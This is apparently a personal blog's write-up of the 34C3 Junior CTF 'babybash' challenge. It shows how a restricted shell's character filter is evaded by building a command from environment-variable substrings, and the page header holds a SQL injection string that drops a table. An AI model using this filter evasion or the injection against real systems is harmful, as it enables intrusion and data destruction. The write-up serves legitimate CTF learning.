1'; drop table user; --

Security. Student. 8CB2 3C56 1BD4 74E5 FB91 8EF8 8B6F 9890 10F7 0975

This is the write up for the Misc challenge “babybash” during the Junior CTF at the 34C3.

When connected to the box via netcat, you were presented with a babybash prompt. A simple

ls

threw an error message. It stated that illegal characters were used, and to run help

help

This printed the illegal characters:

and the hint to run /get_flag to retrieve the flag. The use of upper case letters was allowed, and therefore access to environment varaiables was possible. With clever use of the builtin substring feature in bash(1) the command could be assemble.

For solving the challenge I used the following variables:

> $HOSTNAME
/bin/bash: 28e32c6defa5: command not found
> $PATH
/bin/bash: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: No such file or directory
> $TERM
/bin/bash: xterm: command not found
> $SHELLOPTS
/bin/bash: braceexpand:hashall:interactive-comments: command not found
> $OSTYPE
/bin/bash: linux-gnu: command not found
> $PWD
/bin/bash: /tmp/4a7ddec13b10a2414e458491a00a37b275679ed2: Is a directory

The final solution:

/${OSTYPE:6:1}${TERM:2:1}${TERM:1:1}_${HOSTNAME:9:1}${SHELLOPTS:17:1}${SHELLOPTS:2:1}${OSTYPE:6:1} ${OSTYPE:6:1}${OSTYPE:1:1}${PWD:2:1}${PWD:2:1}${HOSTNAME:2:1}_FLAG_${PWD:3:1}${OSTYPE:0:1}${HOSTNAME:2:1}${SHELLOPTS:2:1}${SHELLOPTS:14:1}${HOSTNAME:2:1}